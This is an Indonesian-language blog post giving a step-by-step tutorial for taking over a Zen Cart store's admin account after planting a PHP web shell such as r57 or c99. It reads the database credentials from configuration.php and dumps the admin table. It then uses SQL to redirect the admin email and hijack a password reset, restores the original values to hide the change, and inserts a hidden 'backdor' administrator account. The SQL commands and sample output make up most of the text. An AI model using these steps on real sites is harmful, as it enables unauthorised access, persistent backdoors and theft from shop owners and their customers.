12:06

How to get admin zen cart

Diposkan oleh OoN_Boy

Sekedar iseng nulis gimana cara mendapatkan password admin di zencart
saya anggap udah pada tau cara masuk phpshell atau tolls lainnya kedalam satu server.

Misalakan di dalam satu host anda mendapatkan web yg menggunakan zencart,
cari file configuration.php
lokasi default zencart terdapat pada /home/user/public_html/includes
contoh isi configuration database pada zencart

define('DB_TYPE', 'mysql');
define('DB_PREFIX', '');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'username_database');
define('DB_SERVER_PASSWORD', 'password_database');
define('DB_DATABASE', 'nama_database');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'db')

kemudian silahkan connet ke databasenya menggunakan tools apa saja seperti r57 / c99 dan sebagainya


lihat pada table admin select * from zen_admin

+-------------+-------------------------------------+
| admin_id | 1 |
+-------------+-------------------------------------+
| admin_name | AdminName |
+-------------+-------------------------------------+
| admin_email | Admin@email |
+-------------+ ------------------------------------+
| admin_pass | 45123e460186209f8f47ac9aba50ca55:a3 |
+-------------+-------------------------------------+
| admin_level | 1 |
+-------------+-------------------------------------+

Sudah terlihat jelas disana password adminnya MD5+SALT.
Dikarenakan saya sendiri tidak dapa mendecryptnya

kita update terlebih dahulu admin_email dengan perinta sql sebagai berikut
update zen_admin set admin_email="email_asli@kamu" where id=1;

jangan lupa email asli adminya di backup terlebihdahulu dikarenakan kita akan membalikan lagi email admin aslinya

lanjut masuk ke page adminya http://target.com/admin ( default admin page zen_cart = /admin ) ada juga sebagian administrator website yg merubahnya menjadi /zenadmin dan lain sebagianya,
kemudian disana ada pilihan Resend Passwordmasukan email_asli@kamu tadi dan buka email kamu dan lihat pada inbox / spam kamu ada password baru :D
sekarang kamu bisa login sebagai administrator website tersebut.
lihat kembali table zen_admin password baru 77dfdb54afa7ac06516d37f1a6e842c9:5b = s4wVO <<== passowrd yg saya dapat
update kembali password dan email admin tadi dengan perintah
update zen_admin set admin_email="Admin@email" where id=1;
update zen_admin set admin_pass="45123e460186209f8f47ac9aba50ca55:a3" where id=1;

setelah di kembalikan jangan lupa nambah admin baru dengan perintah sql
insert into zen_admin (admin_id, admin_name, admin_email, admin_pass, admin_level)
values ('2','backdor','email@adminbackdor','77dfdb54afa7ac06516d37f1a6e842c9:5b','1');


Selesai....... semoga berguna tutorial basi ini, bisa di manfaatkan ke joomla model baru x yah dan lain sebagainya deh
Thanks buat Vrs-hCk Noge Jack yg dah bantuin :D

0 komentar: